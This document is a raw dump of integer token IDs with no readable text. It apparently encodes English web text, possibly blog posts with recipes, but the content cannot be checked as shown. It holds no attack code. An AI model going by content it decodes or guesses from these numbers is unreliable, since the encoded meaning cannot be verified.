263, 748, 852, 29892, 263, 29871, 29896, 29929, 386, 6462, 26343, 528, 4539, 29892, 322, 263, 16646, 29899, 786, 2030, 298, 468, 13748, 261, 29889, 19339, 645, 29880, 417, 3634, 29877, 29892, 22281, 29889, 13, 13, 2887, 366, 508, 1074, 29892, 278, 2834, 310, 278, 2215, 1050, 29899, 13236, 338, 385, 29192, 16342, 10423, 411, 8261, 267, 29892, 3144, 27419, 29892, 322, 429, 13574, 1887, 267, 29889, 1205, 1016, 30010, 29873, 2125, 590, 1734, 363, 372, 29892, 1014, 13086, 363, 3889, 304, 1551, 19793, 545, 29889, 402, 13536, 1065, 29892, 306, 30010, 29885, 11781, 6290, 1260, 880, 2259, 297, 13616, 29892, 306, 30010, 29885, 9850, 292, 15243, 523, 373, 263, 10694, 29889, 1126, 363, 1584, 901, 15874, 1048, 380, 18159, 8261, 2215, 1050, 29899, 8231, 414, 29892, 1423, 714, 590, 8277, 2400, 29901, 13, 13, 5262, 29958, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29888, 2817, 29914, 4018, 29899, 3820, 314, 20657, 29899, 19264, 29899, 15641, 1050, 29899, 13236, 29914, 18798, 29914, 29941, 29953, 29946, 29906, 29945, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29888, 2817, 29914, 4018, 29899, 3820, 314, 20657, 29899, 19264, 29899, 15641, 1050, 29899, 13236, 29914, 29931, 1117, 322, 28272, 2443, 29893, 1124, 597, 18798, 14701, 29889, 3608, 29889, 510, 24629, 29878, 29914, 3844, 389, 1004, 23626, 24629, 29941, 29914, 29939, 29896, 29884, 6344, 15922, 9837, 29990, 29965, 29914, 13, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29895, 23213, 29914, 29880, 1117, 29899, 4632, 29899, 303, 809, 8484, 3636, 27034, 29892, 29871, 29896, 29955, 1085, 29871, 29906, 29900, 29896, 29955, 29871, 29906, 29906, 29901, 29896, 29946, 29901, 29941, 29906, 718, 29900, 29900, 29900, 29900, 1124, 597, 1482, 29889, 3844, 389, 1004, 23626, 29889, 510, 13401, 29886, 29922, 29953, 29941, 29955, 29947, 12881, 635, 29892, 372, 29915, 29879, 6257, 304, 4459, 763, 6709, 29991, 4779, 2996, 1549, 763, 263, 10579, 9613, 301, 291, 29892, 577, 372, 29915, 29879, 871, 8210, 591, 10894, 403, 278, 1833, 521, 9403, 1584, 886, 411, 301, 1117, 29889, 1670, 526, 599, 17690, 310, 2712, 366, 508, 437, 411, 301, 1117, 29892, 18655, 1849, 322, 2217, 931, 29892, 577, 2050, 445, 9522, 412, 263, 8444, 2362, 5570, 363, 5434, 7639, 362, 29889, 306, 4687, 491, 5183, 16308, 21945, 13, 13, 12881, 635, 29892, 372, 30010, 29879, 6257, 304, 4459, 763, 6709, 29991, 4779, 2996, 1549, 763, 263, 10579, 9613, 301, 291, 29892, 577, 372, 30010, 29879, 871, 8210, 591, 10894, 403, 278, 1833, 521, 9403, 1584, 886, 411, 301, 1117, 29889, 13, 13, 8439, 526, 599, 17690, 310, 2712, 366, 508, 437, 411, 301, 1117, 29892, 18655, 1849, 322, 2217, 931, 29892, 577, 2050, 445, 9522, 412, 263, 8444, 2362, 5570, 363, 5434, 7639, 362, 29889, 306, 4687, 491, 5183, 16308, 399, 10412, 30010, 6907, 800, 363, 1886, 29893, 408, 1532, 408, 22045, 10517, 30010, 29879, 11486, 373, 301, 1117, 297, 263, 19262, 373, 1952, 29872, 1137, 12340, 2543, 262, 265, 322, 315, 440, 300, 316, 341, 449, 265, 29892, 769, 1236, 14561, 297, 278, 12461, 12053, 7482, 556, 322, 1754, 437, 29991, 2178, 278, 27654, 322, 12461, 1304, 2400, 2996, 515, 1887, 13681, 2215, 13269, 2791, 1691, 29889, 960, 366, 30010, 276, 5162, 348, 403, 3307, 304, 505, 5089, 25600, 777, 310, 8084, 16696, 7138, 346, 30010, 29879, 2594, 2330, 445, 5771, 1407, 1532, 975, 393, 29892, 470, 916, 2594, 2330, 29892, 470, 411, 21863, 292, 2181, 504, 29891, 18423, 470, 975, 777, 7075, 341, 1479, 1242, 10849, 694, 397, 793, 29889, 13, 13, 11457, 278, 301, 1117, 13630, 267, 15589, 322, 4259, 3578, 368, 411, 15795, 322, 1236, 2496, 29892, 6199, 470, 278, 4646, 1434, 565, 366, 1348, 310, 372, 29889, 5806, 896, 6425, 11831, 4259, 292, 322, 2041, 304, 5716, 10430, 29892, 521, 459, 278, 18655, 1849, 964, 2919, 289, 568, 29899, 29879, 1891, 12785, 29889, 2688, 817, 304, 451, 7984, 2086, 9098, 322, 884, 451, 367, 13299, 2596, 608, 297, 278, 7743, 3234, 29889, 13, 13, 3868, 271, 263, 4320, 13977, 3104, 393, 756, 263, 17343, 975, 18350, 12871, 411, 278, 9922, 535, 9950, 29889, 317, 799, 278, 301, 1117, 13630, 267, 297, 9853, 267, 577, 393, 896, 30010, 276, 451, 11660, 7176, 29889, 323, 24733, 526, 1900, 363, 445, 29889, 15484, 963, 297, 263, 2919, 24907, 12580, 29880, 408, 896, 8341, 29889, 13, 13, 6132, 278, 1021, 411, 278, 18655, 1849, 29892, 925, 3307, 304, 679, 263, 2217, 4805, 21054, 272, 964, 963, 29889, 15484, 1438, 297, 278, 24907, 12580, 29880, 411, 278, 301, 1117, 363, 278, 3256, 29889, 910, 599, 4893, 263, 2217, 1550, 29991, 3462, 263, 2217, 901, 9922, 535, 9950, 565, 4312, 541, 1018, 451, 304, 8805, 701, 411, 263, 282, 566, 29881, 280, 472, 278, 1095, 29899, 445, 508, 367, 7446, 1127, 1283, 408, 4312, 472, 278, 12045, 310, 19035, 263, 2586, 310, 21054, 272, 29889, 887, 508, 884, 696, 579, 278, 3353, 1183, 29890, 574, 297, 278, 288, 854, 541, 769, 366, 1016, 30010, 29873, 679, 278, 23633, 310, 278, 2446, 4331, 30098, 13, 13, 29928, 387, 433, 911, 278, 3104, 411, 278, 19006, 29892, 24559, 412, 701, 738, 10771, 9978, 310, 27654, 322, 18655, 519, 322, 1235, 372, 1027, 1050, 363, 263, 11015, 304, 7984, 1623, 263, 2217, 29889, 3462, 278, 2545, 386, 322, 6963, 1250, 304, 263, 1027, 1050, 29889, 13, 13, 29907, 598, 3730, 885, 26793, 599, 278, 301, 1117, 322, 18655, 1849, 1250, 964, 278, 3104, 29889, 450, 23904, 881, 451, 3755, 4612, 372, 599, 29892, 788, 263, 2586, 901, 2545, 386, 470, 4094, 408, 4312, 29889, 3115, 788, 278, 7171, 506, 29892, 902, 5824, 322, 805, 1575, 313, 735, 15362, 411, 21054, 943, 1244, 14366, 322, 263, 2586, 310, 15795, 322, 1236, 2496, 29889, 13, 13, 29933, 5393, 372, 599, 1250, 304, 263, 1407, 29892, 1407, 4482, 1027, 1050, 29892, 2058, 278, 17343, 373, 10029, 408, 446, 29893, 577, 777, 21837, 1122, 10169, 29892, 322, 731, 263, 12237, 363, 1023, 6199, 29889, 960, 278, 1886, 29893, 1045, 2719, 2086, 2898, 278, 2545, 386, 674, 4953, 9570, 29891, 322, 591, 1016, 30010, 29873, 864, 393, 29889, 13, 13, 29954, 573, 278, 301, 1117, 13630, 267, 263, 2586, 310, 263, 772, 446, 29899, 896, 881, 367, 925, 6257, 304, 6416, 12435, 29889, 27903, 322, 1236, 2496, 304, 21779, 322, 393, 30010, 29879, 372, 29991, 1816, 345, 411, 596, 6425, 11831, 296, 1559, 29890, 310, 7348, 29889, 13, 13, 5262, 29958, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29895, 23213, 29914, 29880, 1117, 29899, 4632, 29899, 303, 809, 29914, 18798, 29914, 29900, 29953, 29941, 29955, 29947, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29895, 23213, 29914, 29880, 1117, 29899, 4632, 29899, 303, 809, 29914, 29907, 20821, 10173, 6290, 417, 262, 323, 666, 1528, 294, 386, 4009, 597, 18798, 14701, 29889, 3608, 29889, 510, 24629, 29878, 29914, 3844, 389, 1004, 23626, 24629, 29941, 29914, 29878, 29940, 29887, 29946, 13513, 29949, 1888, 29923, 29914, 13, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29895, 23213, 29914, 29883, 20821, 29899, 17765, 29899, 29879, 381, 417, 262, 29899, 12632, 29899, 307, 579, 8484, 3636, 29911, 434, 29892, 29871, 29941, 29896, 2627, 29871, 29906, 29900, 29896, 29955, 29871, 29906, 29941, 29901, 29906, 29906, 29901, 29906, 29929, 718, 29900, 29900, 29900, 29900, 1124, 597, 1482, 29889, 3844, 389, 1004, 23626, 29889, 510, 13401, 29886, 29922, 29953, 29906, 29953, 29906, 4806, 29915, 276, 599, 577, 19587, 1438, 3841, 8740, 29887, 1847, 664, 322, 3942, 322, 2834, 29991, 910, 9522, 412, 338, 29811, 14981, 4780, 304, 8273, 322, 5967, 1550, 366, 679, 373, 411, 2712, 322, 2041, 1250, 304, 263, 13016, 292, 29892, 5192, 29891, 17803, 29889, 739, 5304, 515, 278, 29181, 310, 21730, 360, 994, 29892, 697, 310, 1749, 20695, 22873, 1058, 338, 263, 2215, 1050, 29892, 17739, 261, 322, 5637, 29889, 1522, 1389, 21945, 13, 13, 4806, 30010, 276, 599, 577, 19587, 1438, 3841, 8740, 29887, 1847, 664, 322, 3942, 322, 2834, 29991, 910, 9522, 412, 338, 29811, 14981, 4780, 304, 8273, 322, 5967, 1550, 366, 679, 373, 411, 2712, 322, 2041, 1250, 304, 263, 13016, 292, 29892, 5192, 29891, 17803, 29889, 739, 5304, 515, 278, 29181, 310, 21730, 360, 994, 29892, 697, 310, 1749, 20695, 22873, 1058, 338, 263, 2215, 1050, 29892, 17739, 261, 322, 5637, 29889, 13, 13, 3629, 1389, 6290, 417, 262, 323, 666, 1528, 579, 297, 278, 8764, 384, 10173, 313, 643, 1960, 3942, 310, 29871, 29941, 29899, 29946, 29897, 13, 13, 29896, 7075, 341, 1479, 1242, 1522, 1389, 6290, 417, 262, 323, 666, 1528, 579, 29892, 29871, 29906, 29899, 29941, 301, 5824, 13, 13, 29907, 388, 4584, 1236, 2496, 13, 13, 24665, 6370, 1886, 557, 4259, 292, 13, 13, 29949, 1727, 1562, 13, 13, 10512, 713, 4259, 292, 13, 13, 8140, 1133, 373, 291, 13, 13, 29903, 1997, 322, 1236, 2496, 304, 21779, 13, 13, 29896, 29914, 29906, 2654, 373, 291, 29892, 270, 7612, 408, 7429, 13, 13, 29906, 6432, 708, 28367, 2039, 29892, 270, 7612, 304, 29871, 29896, 29914, 29906, 297, 305, 13, 13, 16107, 270, 7612, 12461, 763, 6454, 20452, 29892, 1559, 307, 1372, 29892, 3104, 20452, 30098, 13, 13, 22150, 278, 313, 1753, 307, 16470, 29897, 8889, 417, 262, 6872, 696, 579, 297, 278, 8182, 384, 3104, 13, 13, 20769, 368, 10293, 5617, 280, 278, 2246, 310, 278, 8889, 417, 262, 6872, 696, 579, 411, 599, 278, 805, 1575, 322, 902, 5824, 9904, 2038, 313, 517, 596, 24583, 29889, 22738, 274, 388, 4584, 1236, 2496, 338, 805, 4245, 14366, 13, 13, 22150, 278, 270, 7612, 2654, 373, 291, 373, 2246, 310, 278, 696, 579, 13, 13, 22150, 278, 6432, 708, 2820, 278, 696, 579, 29892, 3412, 411, 738, 916, 270, 7612, 18655, 1849, 13, 13, 22150, 17343, 373, 8182, 384, 3104, 322, 7984, 373, 379, 6259, 29950, 363, 29871, 29945, 29899, 29955, 6199, 13, 13, 1576, 2582, 674, 367, 263, 628, 14803, 322, 22707, 367, 1389, 29891, 696, 579, 393, 674, 6416, 12435, 373, 596, 27350, 29991, 450, 2545, 386, 372, 10017, 508, 367, 7984, 287, 1623, 263, 2586, 964, 263, 5192, 29891, 367, 1389, 8310, 29891, 363, 286, 25936, 3104, 20452, 29889, 13, 13, 3492, 1073, 1749, 289, 650, 29899, 262, 282, 548, 521, 3554, 526, 3623, 4245, 322, 21054, 272, 1319, 29892, 577, 2020, 451, 3765, 1623, 29991, 22351, 263, 29871, 29906, 29899, 29941, 282, 618, 282, 548, 22707, 417, 262, 696, 579, 515, 502, 472, 9999, 304, 5700, 596, 1914, 2428, 29899, 27996, 470, 2888, 269, 1891, 10814, 6393, 521, 3554, 29889, 13, 13, 29949, 332, 282, 548, 29867, 304, 367, 12558, 20793, 29892, 1951, 278, 298, 12099, 526, 3147, 698, 292, 1250, 322, 11483, 373, 4940, 545, 599, 2462, 29892, 577, 591, 3282, 30010, 29873, 1074, 263, 817, 304, 17151, 278, 696, 579, 29889, 15113, 591, 1073, 393, 4940, 2955, 282, 548, 338, 1568, 6133, 297, 5613, 2703, 2442, 29899, 29941, 29879, 515, 321, 1218, 599, 393, 363, 482, 29892, 322, 393, 18254, 29878, 3245, 14169, 304, 366, 5304, 3025, 278, 9950, 29889, 2823, 24190, 30010, 29879, 1400, 373, 282, 548, 301, 538, 1244, 29889, 13, 13, 4074, 342, 11687, 29892, 278, 2441, 9522, 412, 363, 1438, 521, 3554, 5276, 773, 1346, 25047, 282, 548, 30024, 607, 591, 5491, 5251, 338, 925, 7933, 29893, 1161, 292, 29889, 512, 445, 1206, 372, 2869, 12992, 304, 278, 4328, 411, 1346, 264, 29308, 30024, 282, 548, 29892, 607, 756, 1063, 11658, 287, 411, 263, 15795, 322, 2225, 6972, 1230, 1650, 29889, 450, 427, 29308, 6433, 1838, 30010, 29873, 17354, 322, 756, 270, 913, 21054, 272, 29889, 8680, 282, 548, 338, 11630, 451, 427, 29308, 29889, 1939, 298, 555, 2873, 29892, 694, 3677, 747, 24414, 1199, 29892, 694, 2225, 6972, 5056, 29892, 694, 302, 787, 1947, 29889, 13, 13, 1451, 3554, 508, 367, 3300, 2859, 411, 599, 23551, 310, 2712, 29892, 577, 591, 30010, 645, 5967, 393, 701, 304, 366, 29889, 2266, 591, 3763, 289, 12535, 263, 805, 21705, 9890, 10674, 1161, 322, 304, 2986, 372, 411, 541, 357, 322, 10849, 5962, 1236, 2496, 29892, 872, 1082, 287, 777, 3708, 552, 413, 744, 313, 29954, 538, 759, 30010, 29879, 402, 473, 2527, 29897, 411, 7171, 506, 322, 867, 630, 923, 968, 373, 2246, 29892, 322, 377, 16242, 701, 385, 26163, 29914, 1127, 19006, 29914, 29890, 1338, 314, 293, 12507, 346, 363, 278, 521, 3554, 29889, 678, 3554, 723, 884, 748, 2107, 411, 263, 2846, 310, 1749, 1153, 1403, 5079, 29892, 541, 725, 329, 10674, 1161, 5304, 304, 3458, 29892, 470, 5505, 9922, 535, 269, 482, 29973, 13, 13, 23684, 29899, 2008, 1965, 498, 860, 315, 329, 349, 548, 678, 3554, 13, 13, 26036, 9522, 412, 515, 17278, 29879, 28070, 630, 13, 13, 29896, 29871, 29906, 29899, 29941, 27981, 7075, 341, 1479, 1242, 4940, 545, 29899, 336, 3368, 282, 548, 22707, 417, 262, 696, 579, 13, 13, 14592, 310, 15795, 322, 1236, 2496, 13, 13, 29906, 6131, 1129, 787, 1880, 12871, 18655, 519, 17182, 13, 13, 22150, 263, 4320, 13977, 2071, 7324, 4802, 3307, 304, 4808, 408, 1784, 521, 3554, 408, 366, 30010, 276, 3907, 297, 278, 288, 854, 29889, 9603, 288, 854, 304, 29871, 29945, 29900, 29900, 29943, 322, 1235, 278, 7243, 12871, 6446, 29889, 3940, 29901, 565, 366, 1016, 30010, 29873, 5491, 12871, 596, 288, 854, 445, 7375, 596, 25158, 21200, 1122, 748, 1283, 29991, 349, 3445, 596, 11192, 1550, 366, 4480, 29892, 1369, 3099, 763, 10674, 1161, 470, 3104, 20452, 29889, 13, 13, 6816, 273, 8000, 29892, 5700, 596, 696, 579, 964, 1584, 269, 1891, 12785, 408, 12003, 408, 366, 30010, 29881, 763, 29889, 306, 2869, 1304, 263, 313, 29893, 1161, 519, 29897, 364, 8584, 304, 679, 29871, 29896, 29889, 29945, 30160, 521, 3554, 29889, 27903, 322, 1236, 2496, 521, 3554, 373, 1716, 11192, 29889, 3967, 1560, 12504, 15795, 565, 366, 505, 372, 1361, 29891, 29889, 13, 13, 29907, 598, 3730, 29892, 411, 12003, 288, 854, 22219, 29879, 29892, 3349, 2071, 7324, 515, 278, 288, 854, 322, 2058, 975, 1880, 12871, 373, 278, 380, 586, 300, 459, 29889, 3462, 278, 17182, 322, 12871, 2745, 925, 1560, 17223, 29889, 1952, 309, 4094, 363, 4940, 29874, 472, 445, 1298, 29889, 13, 13, 2528, 521, 3554, 304, 278, 7243, 411, 21861, 29879, 577, 366, 508, 2058, 963, 988, 366, 864, 963, 1728, 8401, 963, 2820, 29889, 17278, 373, 278, 937, 2625, 363, 29871, 29906, 6233, 2745, 28138, 3347, 9571, 29892, 769, 285, 3466, 29889, 19152, 285, 492, 3262, 29892, 10365, 278, 12871, 408, 4312, 29892, 1023, 6233, 373, 1269, 2625, 2745, 263, 14563, 8328, 13623, 29871, 29896, 29906, 29900, 29899, 29896, 29906, 29945, 14496, 383, 322, 25591, 338, 6501, 261, 17354, 322, 2181, 275, 2272, 29889, 1938, 451, 5967, 278, 521, 3554, 363, 2086, 1472, 373, 263, 2625, 470, 896, 674, 975, 15108, 29889, 13, 13, 4178, 445, 1298, 278, 521, 3554, 526, 451, 3447, 6446, 7984, 287, 29899, 3349, 963, 515, 278, 2071, 7324, 322, 2058, 373, 263, 15284, 1090, 1701, 309, 363, 29871, 29896, 29900, 29899, 29896, 29945, 6233, 29889, 910, 338, 2000, 1346, 4287, 719, 957, 7984, 292, 30024, 29899, 278, 521, 3554, 674, 6773, 304, 12871, 2745, 896, 526, 1048, 29871, 29896, 29946, 29900, 14496, 383, 29889, 2688, 881, 367, 3578, 282, 682, 297, 278, 1644, 414, 746, 2309, 29889, 6438, 738, 4996, 29899, 15108, 292, 11192, 1550, 278, 521, 3554, 1791, 373, 278, 15284, 29899, 872, 1082, 287, 1395, 575, 2125, 3695, 29945, 1375, 29892, 1153, 1403, 5079, 1045, 309, 297, 29871, 29906, 1375, 29889, 13, 13, 5262, 29958, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29895, 23213, 29914, 27996, 29899, 7582, 29899, 6718, 6393, 29899, 29886, 548, 29899, 305, 3554, 29914, 18798, 29914, 29941, 29953, 29906, 29946, 29946, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29895, 23213, 29914, 27996, 29899, 7582, 29899, 6718, 6393, 29899, 29886, 548, 29899, 305, 3554, 29914, 1523, 3921, 25453, 830, 24044, 29899, 6000, 535, 322, 349, 5427, 29991, 1124, 597, 18798, 14701, 29889, 3608, 29889, 510, 24629, 29878, 29914, 3844, 389, 1004, 23626, 24629, 29941, 29914, 29949, 29872, 29934, 29946, 29940, 303, 29920, 9472, 29900, 29914, 13, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29895, 23213, 29914, 510, 3921, 29899, 1181, 397, 29899, 4361, 412, 29899, 2291, 535, 29899, 392, 29899, 29886, 5427, 8484, 3636, 29903, 271, 29892, 29871, 29906, 29896, 2627, 29871, 29906, 29900, 29896, 29955, 29871, 29900, 29900, 29901, 29945, 29900, 29901, 29941, 29941, 718, 29900, 29900, 29900, 29900, 1124, 597, 1482, 29889, 3844, 389, 1004, 23626, 29889, 510, 13401, 29886, 29922, 29953, 29906, 29896, 29947, 8139, 287, 1554, 14294, 322, 13016, 292, 363, 17803, 29973, 1932, 297, 7404, 29892, 350, 2477, 1164, 29889, 910, 367, 1503, 777, 29501, 304, 1749, 872, 21125, 322, 4940, 29874, 9522, 412, 29899, 2524, 29895, 368, 591, 17545, 263, 3287, 310, 27654, 29974, 29886, 5427, 29974, 29122, 29889, 306, 2099, 29892, 825, 1683, 338, 727, 29973, 8084, 4723, 674, 367, 263, 696, 579, 29892, 11640, 29991, 910, 9522, 412, 3978, 630, 1244, 29892, 322, 769, 3939, 263, 2586, 29889, 3462, 263, 2319, 4497, 328, 565, 366, 21945, 13, 13, 8139, 287, 1554, 14294, 322, 13016, 292, 363, 17803, 29973, 1932, 297, 7404, 29892, 350, 2477, 1164, 29889, 910, 367, 1503, 777, 29501, 304, 1749, 872, 21125, 322, 4940, 29874, 9522, 412, 29994, 2524, 29895, 368, 591, 17545, 263, 3287, 310, 27654, 29974, 29886, 5427, 29974, 29122, 29889, 306, 2099, 29892, 825, 1683, 338, 727, 29973, 8084, 4723, 674, 367, 263, 696, 579, 29892, 11640, 29991, 13, 13, 4013, 9522, 412, 3978, 630, 1244, 29892, 322, 769, 3939, 263, 2586, 29889, 3462, 263, 2319, 4497, 328, 565, 366, 817, 901, 304, 596, 592, 284, 29991, 13, 13, 29896, 29914, 29906, 3577, 310, 7075, 341, 1479, 1242, 1939, 397, 793, 29899, 306, 1304, 12267, 26286, 271, 322, 438, 271, 445, 931, 541, 377, 4070, 369, 366, 763, 29991, 13, 13, 19159, 278, 9922, 535, 297, 263, 4320, 13977, 2071, 7324, 2745, 2181, 275, 2272, 29892, 2058, 373, 5650, 304, 20466, 304, 6425, 11831, 4805, 1395, 559, 322, 769, 2181, 15563, 29889, 13, 13, 29925, 473, 1283, 599, 541, 29871, 29906, 6131, 1129, 787, 310, 278, 9950, 515, 7243, 29889, 940, 271, 975, 17768, 403, 1652, 420, 322, 788, 278, 373, 1080, 29889, 17278, 2745, 10029, 3347, 9571, 322, 6257, 304, 4964, 264, 29889, 13, 13, 29933, 5393, 263, 3104, 310, 4094, 304, 263, 1045, 309, 363, 278, 4940, 29874, 29889, 13, 13, 2528, 297, 610, 29879, 1240, 567, 29892, 2545, 386, 29892, 13848, 387, 279, 29892, 17354, 26438, 322, 1236, 2496, 17422, 10794, 313, 29902, 3060, 2986, 263, 270, 1255, 1236, 2496, 515, 590, 16423, 29892, 372, 6077, 714, 263, 2217, 373, 278, 7375, 2625, 467, 624, 381, 2745, 278, 26438, 338, 23556, 1490, 322, 610, 29879, 1240, 567, 505, 4964, 6419, 701, 263, 2586, 29889, 13, 13, 2528, 297, 4203, 278, 9922, 535, 322, 599, 310, 278, 5321, 3163, 29892, 28189, 304, 281, 2782, 322, 14405, 29892, 1235, 1027, 1050, 304, 10032, 278, 2545, 386, 304, 263, 12507, 346, 29889, 13, 13, 8809, 488, 278, 12461, 338, 1027, 1050, 292, 263, 2586, 29892, 28189, 278, 4940, 29874, 297, 278, 1045, 6504, 4094, 363, 1023, 6233, 29892, 769, 270, 6038, 29889, 13, 13, 2528, 4940, 29874, 304, 12461, 7243, 322, 28189, 4129, 4208, 29899, 366, 881, 505, 925, 3307, 23904, 1546, 4805, 4094, 373, 278, 4940, 29874, 322, 9922, 535, 21054, 4395, 2545, 386, 304, 2367, 4129, 263, 2217, 12507, 346, 1728, 1641, 22300, 29891, 29889, 3371, 291, 964, 270, 17006, 470, 9080, 297, 263, 7575, 4802, 4940, 29874, 12580, 29880, 29991, 13, 13, 5262, 29958, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29895, 23213, 29914, 510, 3921, 29899, 1181, 397, 29899, 4361, 412, 29899, 2291, 535, 29899, 392, 29899, 29886, 5427, 29914, 18798, 29914, 29900, 29953, 29906, 29896, 29947, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29895, 23213, 29914, 510, 3921, 29899, 1181, 397, 29899, 4361, 412, 29899, 2291, 535, 29899, 392, 29899, 29886, 5427, 29914, 19203, 830, 24044, 29899, 317, 1485, 482, 322, 349, 5427, 1124, 597, 18798, 14701, 29889, 3608, 29889, 510, 24629, 29878, 29914, 3844, 389, 1004, 23626, 24629, 29941, 29914, 5091, 29902, 747, 29940, 29950, 29945, 1896, 29893, 29914, 13, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29895, 23213, 29914, 6207, 29899, 4361, 412, 29899, 29879, 1485, 482, 29899, 392, 29899, 29886, 5427, 8484, 3636, 27034, 29892, 29871, 29896, 29941, 2627, 29871, 29906, 29900, 29896, 29955, 29871, 29896, 29955, 29901, 29945, 29900, 29901, 29946, 29953, 718, 29900, 29900, 29900, 29900, 1124, 597, 1482, 29889, 3844, 389, 1004, 23626, 29889, 510, 13401, 29886, 29922, 29953, 29896, 29929, 29947, 25559, 366, 3926, 1476, 7535, 380, 4362, 964, 278, 1424, 5525, 9873, 825, 304, 437, 411, 599, 393, 7075, 341, 1479, 1242, 872, 21125, 322, 10849, 4940, 29874, 29973, 910, 4723, 372, 471, 282, 548, 269, 482, 872, 21125, 322, 805, 2152, 322, 288, 271, 4940, 29874, 856, 13, 13, 25559, 366, 3926, 1476, 7535, 380, 4362, 964, 278, 1424, 5525, 9873, 825, 304, 437, 411, 599, 393, 7075, 341, 1479, 1242, 872, 21125, 322, 10849, 4940, 29874, 29973, 3118, 310, 590, 15381, 568, 2712, 338, 3907, 263, 2560, 7243, 12507, 346, 515, 278, 872, 21125, 322, 28189, 292, 372, 411, 377, 4070, 369, 12875, 310, 694, 397, 793, 24190, 1754, 393, 4723, 29889, 910, 4723, 372, 471, 282, 548, 269, 482, 872, 21125, 313, 473, 716, 342, 6124, 14366, 322, 805, 2152, 322, 288, 271, 4940, 29874, 313, 4716, 591, 505, 1432, 4723, 467, 13, 13, 3492, 508, 1207, 738, 1353, 310, 21833, 304, 445, 9522, 412, 29892, 3704, 28189, 292, 297, 777, 1395, 575, 411, 278, 4940, 29874, 408, 372, 1045, 2719, 470, 916, 12461, 313, 4287, 307, 1372, 29892, 1506, 1558, 1379, 7689, 17718, 29892, 1395, 575, 29892, 1236, 22437, 30098, 29897, 411, 278, 373, 1080, 322, 872, 21125, 29889, 5293, 263, 2545, 386, 304, 3587, 433, 911, 278, 7243, 674, 2367, 366, 263, 7575, 2560, 12507, 346, 21054, 272, 304, 19595, 278, 902, 29890, 872, 375, 1179, 313, 1202, 777, 10849, 902, 5824, 310, 596, 1914, 14366, 470, 366, 508, 1018, 773, 263, 367, 261, 411, 1749, 413, 709, 6500, 29874, 470, 1506, 271, 29893, 26268, 29889, 17278, 292, 674, 19310, 675, 278, 21054, 2470, 310, 278, 367, 261, 577, 748, 363, 1554, 4439, 1017, 3265, 1135, 5089, 23717, 29889, 13, 13, 29902, 30010, 29885, 884, 3704, 263, 9522, 412, 363, 263, 399, 2817, 12267, 17236, 300, 519, 3956, 328, 2400, 29892, 1363, 372, 30010, 29879, 2289, 4780, 322, 674, 748, 411, 278, 694, 397, 793, 29991, 15113, 372, 30010, 29879, 806, 1772, 29871, 29941, 29900, 15878, 29889, 13, 13, 29903, 1485, 482, 322, 7243, 12507, 346, 975, 10849, 694, 397, 793, 313, 29906, 17768, 403, 3348, 886, 29897, 13, 13, 29906, 19018, 541, 357, 13, 13, 29896, 2919, 373, 291, 29892, 16835, 368, 269, 506, 287, 13, 13, 29906, 7075, 341, 1479, 1242, 872, 375, 1179, 13, 13, 29896, 29900, 29871, 1309, 778, 2545, 386, 313, 29122, 29892, 521, 21475, 29892, 470, 7013, 1989, 29897, 470, 367, 261, 29892, 763, 263, 301, 1875, 13, 13, 29896, 29914, 29906, 3577, 10849, 7075, 341, 1479, 1242, 694, 397, 793, 13, 13, 797, 263, 2919, 9416, 2071, 7324, 29892, 5821, 2197, 4320, 13977, 29892, 286, 2152, 278, 541, 357, 322, 872, 329, 29948, 278, 373, 1080, 975, 18350, 12871, 2745, 5578, 1682, 296, 13, 13, 2528, 278, 872, 21125, 304, 278, 7243, 322, 17354, 373, 1269, 2625, 363, 263, 2846, 6233, 313, 1202, 777, 5192, 631, 12461, 1244, 565, 366, 6755, 29897, 13, 13, 29925, 473, 596, 23904, 310, 7348, 975, 278, 872, 21125, 322, 373, 1080, 29892, 885, 2390, 292, 278, 5970, 310, 278, 7243, 263, 2586, 29889, 1771, 292, 304, 263, 1045, 309, 29892, 769, 10032, 12871, 322, 1027, 1050, 2745, 23904, 338, 12212, 29892, 1048, 29871, 29906, 29945, 6233, 29892, 2745, 372, 30010, 29879, 901, 12507, 346, 29899, 4561, 322, 263, 2586, 12003, 6419, 29889, 313, 1202, 1395, 575, 1244, 565, 7984, 292, 411, 872, 21125, 29897, 13, 13, 6816, 273, 8000, 29892, 6963, 263, 3104, 310, 4094, 304, 263, 1045, 309, 363, 278, 4940, 29874, 29889, 13, 13, 10401, 596, 872, 21125, 23904, 338, 12212, 304, 263, 15590, 5253, 304, 24296, 278, 4940, 29874, 411, 29892, 5768, 278, 694, 397, 793, 313, 392, 1395, 575, 29892, 565, 366, 763, 963, 901, 281, 2782, 287, 29897, 964, 278, 1045, 6504, 4094, 29892, 23546, 29892, 322, 7984, 363, 29871, 29906, 6233, 29889, 360, 6038, 694, 397, 793, 297, 263, 784, 3825, 322, 2058, 297, 16330, 270, 728, 29898, 267, 467, 13, 13, 22150, 872, 375, 1179, 373, 278, 694, 397, 793, 322, 1671, 278, 7243, 12507, 346, 322, 373, 1080, 975, 4129, 29889, 323, 2209, 304, 24296, 322, 9080, 411, 263, 4497, 328, 565, 366, 3282, 30010, 29873, 788, 18655, 1849, 1550, 7984, 292, 29991, 13, 13, 29956, 2817, 12267, 17236, 300, 519, 3956, 328, 313, 29906, 3348, 886, 29897, 13, 13, 16894, 304, 1085, 15457, 22389, 363, 278, 2441, 9522, 412, 29991, 910, 10714, 292, 286, 514, 1242, 411, 263, 2217, 5046, 29892, 322, 372, 3732, 3307, 304, 1833, 363, 3196, 3841, 29889, 15950, 1898, 7984, 292, 278, 12461, 491, 1045, 6504, 322, 1886, 11500, 306, 30010, 29881, 6907, 1886, 11500, 29892, 607, 11551, 29879, 901, 18254, 374, 1237, 322, 3913, 3109, 4094, 29889, 13, 13, 29963, 387, 300, 1849, 29901, 13, 13, 29896, 16483, 1771, 1558, 1379, 7689, 17718, 13, 13, 29906, 2723, 567, 310, 3060, 2986, 1559, 307, 1372, 13, 13, 29896, 